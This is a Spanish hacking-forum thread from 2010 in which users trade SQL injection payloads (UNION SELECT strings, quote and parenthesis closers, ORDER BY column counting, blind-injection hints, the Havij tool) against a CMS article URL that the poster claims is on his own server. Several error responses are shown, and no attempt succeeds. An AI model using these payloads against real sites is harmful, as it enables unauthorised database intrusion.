Título: Problema al hacer una SQLi Publicado por: Debci en 1 Septiembre 2010, 19:24 pm Hola muy buenas a todos, probando una SQLi he encontrado lo que parece ser un posible vector de ataque:
Código: http://www.mipagina.com/articulo/'1 CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1 CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1 Se supone que asi es vulnerable no? Pero cuando intento hacer la injeción con esto: Código: -1+union+select+1,2,3,n-- (Con n me refiero a que voy subiendo de tablas) Al insertar el -1 se va el error y no aparece ninguna tabla tras probar hasta 20 (no creo que haya mas, sinceramente). Es vulnerable o simplemente no la estoy atacando bien? Saludos Título: Re: Problema al hacer una SQLi Publicado por: tragantras en 1 Septiembre 2010, 20:19 pm prueba con
-1') union all select 1,2,3,4,n-- Título: Re: Problema al hacer una SQLi Publicado por: Debci en 1 Septiembre 2010, 21:34 pm prueba con Bad response :/-1') union all select 1,2,3,4,n-- CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1 Gracias por tu ayuda :) Saludos Título: Re: Problema al hacer una SQLi Publicado por: tragantras en 1 Septiembre 2010, 22:01 pm es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con
Código: ') pueds probar a hacer: -1') union all select 1,2,3,4,'n fijate que la n lleva la comilla antes! en fin, prueba y postea! Título: Re: Problema al hacer una SQLi Publicado por: Debci en 1 Septiembre 2010, 22:06 pm es que segun la salida que pusiste al principio, estoy casi seguro que el cierre sería con Mira, si hago esto:Código: ') pueds probar a hacer: -1') union all select 1,2,3,4,'n fijate que la n lleva la comilla antes! en fin, prueba y postea! Código: -1')+union+all+select+1,2,3,4,'5-- CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 1 Sin embargo si pruebo con: Código: -1')+union+all+select+1,2,3,'4,'5-- CMS_GetArticleByURL: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5--')' at line 1 Por lo que sospecho que las comillas no estan situadas como me parecia :S Saludos Título: Re: Problema al hacer una SQLi Publicado por: tragantras en 1 Septiembre 2010, 23:41 pm vale, prueba con:
Código: -1')+union+all+select+1,2,3,4,('5-- (fijate en el parentesis) sino, intenta realizar la consulta sin comentar el final de ella Título: Re: Problema al hacer una SQLi Publicado por: OzX en 2 Septiembre 2010, 01:21 am hi bro.
http://www.mipagina.com/articulo/'1 provaste con? http://www.mipagina.com/articulo/1' http://www.mipagina.com/articulo/'1'' te muestra el mismo resultado ? o te tira algun error al poner 2 comillas simples? http://www.mipagina.com/articulo/1+and+1=1+order+by+99+--+ y con eso que te muestra? Título: Re: Problema al hacer una SQLi Publicado por: Debci en 2 Septiembre 2010, 09:35 am hi bro. He conseguido que con eso me devuelva:http://www.mipagina.com/articulo/'1 provaste con? http://www.mipagina.com/articulo/1' http://www.mipagina.com/articulo/'1'' te muestra el mismo resultado ? o te tira algun error al poner 2 comillas simples? http://www.mipagina.com/articulo/1+and+1=1+order+by+99+--+ y con eso que te muestra? CMS_GetContentIDByName: Unknown column '87' in 'order clause' Por lo que hay mas tablas de las que sospechaba! ES este codigo el que he usado: Código: -1')+and+1=1+order+by+87+--+ Y con dos comillas suelta esto: CMS_GetContentIDByName: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''') OR (url_rewrite = ''1''') LIMIT 1' at line 1 Codigo usado: Código: '1'' Saludos Título: Re: Problema al hacer una SQLi Publicado por: raul338 en 2 Septiembre 2010, 17:41 pm Código: -1+union+select+1,2,3,n; -- :) Título: Re: Problema al hacer una SQLi Publicado por: Debci en 2 Septiembre 2010, 20:05 pm Código: -1+union+select+1,2,3,n; -- :) Saludos Título: Re: Problema al hacer una SQLi Publicado por: tragantras en 3 Septiembre 2010, 00:54 am vaya hueso duro de roer...
deberías partir de la base de que la query original debes cerrarla con: Citar ') y terminarla con: Código: (' es que parece que el "comentado" no te lo tiene en cuenta, verdad? no se... yo no se que más decirte! xD si se pasa alguien que sepa más pues que arroje luz al asunto, mientras tanto, suerte! xD Título: Re: Problema al hacer una SQLi Publicado por: OzX en 3 Septiembre 2010, 03:03 am -1')+and+1=1+order+by+87+--+
si te tira ese erro q mencinoas ahi tenes tu sqli estable nada mas anda provando -1')+and+1=1+order+by+15+--+ -1')+and+1=1+order+by+10+--+ hasta que no te tire error luego cambia el 1=1 por 1=0 y tendras tu SQLI estable. Saludos. Título: Re: Problema al hacer una SQLi Publicado por: raul338 en 3 Septiembre 2010, 04:15 am Código: -1+union+select+1,2,3,n; -- :) Saludos No crees que es buena señal eso? No se pueden ver los resultados de la query ? Título: Re: Problema al hacer una SQLi Publicado por: Debci en 3 Septiembre 2010, 10:02 am Código: -1+union+select+1,2,3,n; -- :) Saludos No crees que es buena señal eso? No se pueden ver los resultados de la query ? Saludos Título: Re: Problema al hacer una SQLi Publicado por: tragantras en 3 Septiembre 2010, 11:43 am intenta con blind injection, si la consulta no te tira un error se entiene que está bien formada, prueba con lo tipico de count (*) y mira a ver si hay information_schema
Título: Re: Problema al hacer una SQLi Publicado por: Debci en 3 Septiembre 2010, 15:58 pm intenta con blind injection, si la consulta no te tira un error se entiene que está bien formada, prueba con lo tipico de count (*) y mira a ver si hay information_schema Information schema hay porque en esta web tengo instalado el MySQL 5.0 (no se si he comentado que esta en mi servidor y debo probar su seguridad)Ya mis pruebo con una blind y os comento. Saludos Título: Re: Problema al hacer una SQLi Publicado por: pilotcast en 3 Septiembre 2010, 18:17 pm xD men hubieras empezado por hai... si es tu web puedes facilitarles el code al los chavales y asi te ayudarian mas rapido... :laugh: jajaja igual falta que ellos quieran eso...
Título: Re: Problema al hacer una SQLi Publicado por: Debci en 3 Septiembre 2010, 18:35 pm xD men hubieras empezado por hai... si es tu web puedes facilitarles el code al los chavales y asi te ayudarian mas rapido... :laugh: jajaja igual falta que ellos quieran eso... La web no es mia, el servidor si, y segun las reglas no puedo ver dicho codigo fuente, tengo que vulnerarla como si fuese normal.Saludos Título: Re: Problema al hacer una SQLi Publicado por: GhostLT en 3 Septiembre 2010, 21:12 pm Intenta con Havij tool + SQLi Scanner
Título: Re: Problema al hacer una SQLi Publicado por: tragantras en 4 Septiembre 2010, 17:11 pm debci cuenta como quedó el asunto! sacaste algo? tengo un par de links que te pueden venir bien, en fin, responde xD
Título: Re: Problema al hacer una SQLi Publicado por: Debci en 5 Septiembre 2010, 11:38 am debci cuenta como quedó el asunto! sacaste algo? tengo un par de links que te pueden venir bien, en fin, responde xD De momento no he conseguido nada, no me arrojan resultados positivos, ahora probaré con los dos softs que me recomendó el compañero.Saludos |